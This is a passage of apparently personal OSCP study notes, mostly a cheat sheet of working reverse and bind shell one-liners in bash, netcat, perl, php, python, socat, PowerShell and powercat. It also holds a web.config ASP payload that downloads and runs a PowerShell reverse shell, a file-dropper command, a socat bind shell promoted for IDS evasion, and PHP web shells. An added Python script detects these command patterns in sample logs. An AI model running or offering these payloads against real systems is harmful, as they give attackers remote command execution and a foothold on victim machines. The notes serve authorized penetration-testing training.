OSCP notes dump: #POSTEXPLOIT-SHELL


Establishing a stable connection to the target is one of the most important steps before compromising its network. Executing exploits over and over again may trigger the blue team's attention. I made some notes about shells during my OSCP preparation, but most of the time I used pentestmonkey (https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) or highon.coffee (https://highon.coffee/blog/reverse-shell-cheat-sheet/). However, my notes might contain some additional information that could be helpful.

Shell Beautifier

# 1. inside the caught shell - upgrade the dumb shell to a pty
python -c 'import pty;pty.spawn("/bin/bash")'
# 2. on the attackers terminal - background the shell with Ctrl+Z
^Z
# 3. put the local terminal into raw mode (no local echo/line editing), then foreground the shell
stty raw -echo; fg
# 4. inside the upgraded shell - fix the environment
export SHELL=bash
export TERM=xterm-256color

Reverse TCP

netcat

# 1. attackers box  - spawn listener
nc -nlvp 4444 
# -n numeric mode, only IP address
# -l  listen mode, for inbound connections
# -v verbose mode
# -p local port number
# 2. target - connect to listener
nc <IP of attackers box> 4444 -e /bin/bash
# -e filename to execute after connect

bash

bash -i >& /dev/tcp/<IP of attackers box>/4444 0>&1

perl

perl -e 'use Socket;$i="10.10.14.12";$p=1337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

php

php -r '$sock=fsockopen("<attackers box IP>",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

xterm

xterm -display <IP of attackers box>:1
# start X Server (:1 – which listens on TCP port 6001). run on your system
Xnest :1
# authorize the target to connect to you (command also run on your host):
xhost +<targetip>

socat

# on kali 
socat -d -d TCP4-LISTEN:80 STDOUT
# on victim 
socat TCP4:172.16.5.1:80 EXEC:/bin/bash 

python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

webconfig

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
    <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<%@ Language=VBScript %>
<%
  call Server.CreateObject("WSCRIPT.SHELL").Run("cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.14.5/Invoke-PowerShellTcp.ps1')")
%> 

powershell

$client = New-Object System.Net.Sockets.TCPClient -ArgumentList '10.10.1.2',443
$stream = $client.GetStream()
$bytes = 0..65535 | ForEach-Object {0}
while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{
$data = (New-Object System.Text.ASCIIEncoding).GetString($bytes, 0, $i)
$sendback = iex $data 2>&1 | Out-String
$sendback2 = "$sendback PS $(Get-Location).Path> "
$sendbyte = [System.Text.Encoding]::ASCII.GetBytes($sendback2)
$stream.Write($sendbyte, 0, $sendbyte.Length)
$stream.Flush()
}
$client.Close()
powershell -c "$client = New-Object System.Net.Sockets.TCPClient -ArgumentList '192.168.119.210',7777; $stream = $client.GetStream(); $bytes = 0..65535 | ForEach-Object {0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){ $data = (New-Object System.Text.ASCIIEncoding).GetString($bytes, 0, $i); $sendback = iex $data 2>&1 | Out-String; $sendback2 = $sendback + 'PS ' + $(Get-Location).Path + '> '; $sendbyte = [System.Text.Encoding]::ASCII.GetBytes($sendback2); $stream.Write($sendbyte, 0, $sendbyte.Length); $stream.Flush()}; $client.Close()"

powercat

# attacker
nc -nlvp 1337
# target
powercat -c 10.11.0.4 -p 1337 -e cmd.exe
# encoded (base64) stand-alone payload
PS: powercat -c <attack-ip> -p 1337 -e cmd.exe -ge > reverseshell.ps1
# target
powershell.exe -E <whole-base64-string-of-reverseshell.ps1>

windows file dropper

powershell -NoLogo -Command "$webClient = new-object System.Net.WebClient; $webClient.DownloadFile('http://10.10.11.12/Powerless.bat', 'powerless.bat')"
nc.exe 192.123.111.1 1337 -e cmd.exe

Bind TCP

netcat

# attackers box - connect to the target's listener (once it is up)
nc <target IP> 4444
# target - listen and hand out a shell
nc -nlvp 4444 -e /bin/bash
# -n numeric mode, only IP address
# -l  listen mode, for inbound connections
# -v verbose mode
# -p local port number

socat (good for IDS/IPS evasion)

# create self-signed cert and combine key + cert into the single pem file socat expects
openssl req -newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt
cat shell.key shell.crt > shell.pem
# target (needs shell.pem in place; root for port 443)
sudo socat OPENSSL-LISTEN:443,cert=shell.pem,verify=0,fork EXEC:/bin/bash
# attacker 
socat - OPENSSL:10.11.0.4:443,verify=0

powercat (windows)

# target
powercat -l -v -p 1337 -e cmd.exe
# attacker
nc <target-ip> 1337

powershell (windows)

powershell -c "$listener = New-Object System.Net.Sockets.TcpListener -ArgumentList '0.0.0.0',443; $listener.Start(); $client = $listener.AcceptTcpClient(); $stream = $client.GetStream(); $bytes = 0..65535 | ForEach-Object {0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){ $data = (New-Object System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = iex $data 2>&1 | Out-String; $sendback2 = $sendback + 'PS ' + $(Get-Location).Path + '> '; $sendbyte = [System.Text.Encoding]::ASCII.GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close(); $listener.Stop()"
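
A detection-side counterpart to the Reverse TCP and Bind TCP one-liners above, added here as an example that is not part of the original notes: it runs a small rule set over constructed process-audit lines (the `<pid> <user> <cmdline>` format and every event are assumed) and flags the command-line shapes listed in those sections, requiring two indicators per rule where possible so that a bare listener or an ordinary socket script is not reported.

```python
import re

# Constructed sample process-audit events (not real logs): "<pid> <user> <cmdline>".
# The cmdlines mirror the reverse/bind shell one-liners collected in these notes.
SAMPLE_EVENTS = [
    "1201 www-data bash -i >& /dev/tcp/10.10.14.12/4444 0>&1",
    "1202 root nc -nlvp 4444 -e /bin/bash",
    "1203 www-data python -c 'import socket,subprocess,os;s=socket.socket();os.dup2(s.fileno(),0)'",
    "1204 www-data perl -e 'use Socket;connect(S,...);exec(\"/bin/sh -i\");'",
    "1205 www-data php -r '$sock=fsockopen(\"10.10.14.12\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");'",
    "1206 www-data socat TCP4:172.16.5.1:80 EXEC:/bin/bash",
    "1207 svc_iis powershell -c \"$client = New-Object System.Net.Sockets.TCPClient('10.10.1.2',443); iex $data\"",
    "1208 svc_iis powershell -c \"$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443); iex $data\"",
    "1209 user powercat -c 10.11.0.4 -p 1337 -e cmd.exe",
    "1210 user nc.exe 192.123.111.1 1337 -e cmd.exe",
    "1211 user nc -nlvp 4444",
    "1212 backup tar czf /backup/www.tgz /var/www",
    "1213 dev python -c 'import socket; print(socket.gethostname())'",
]

# Each rule is a list of regexes that must ALL match the same command line;
# pairing a socket indicator with an exec indicator keeps benign hits low.
RULES = {
    "bash_dev_tcp": [r"/dev/tcp/[^/\s]+/\d+"],
    "netcat_exec": [r"\bnc(?:\.exe)?\b", r"\s-e\s+\S+"],
    "powercat_exec": [r"\bpowercat\b", r"\s-e\s+\S+"],
    "python_socket_dup2": [r"socket\.socket\(", r"\bdup2\("],
    "perl_socket_exec": [r"use Socket;", r"\bexec\("],
    "php_fsockopen_exec": [r"\bfsockopen\(", r"\b(?:exec|system|shell_exec|passthru)\("],
    "socat_exec": [r"\bsocat\b", r"\bEXEC:"],
    "powershell_tcp_iex": [r"Sockets\.Tcp(?:Client|Listener)", r"\b(?:iex|Invoke-Expression)\b"],
}
COMPILED = {n: [re.compile(p, re.IGNORECASE) for p in pats] for n, pats in RULES.items()}


def scan_events(events):
    """Return [(pid, rule_name), ...] for every event whose cmdline satisfies a rule."""
    hits = []
    for event in events:
        pid, _user, cmdline = event.split(" ", 2)
        for name, patterns in COMPILED.items():
            if all(p.search(cmdline) for p in patterns):
                hits.append((int(pid), name))
    return hits


if __name__ == "__main__":
    for pid, rule in scan_events(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}")
```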

Webshell

kali linux webshells

/usr/share/webshells/php/

ippsec style

index.php&ipp=ls
<?php echo system($_REQUEST["ipp"]); ?>
<?php echo shell_exec($_GET['cmd']); ?>

weevely3 weaponized web shell

GitHub - epinna/weevely3: Weaponized web shell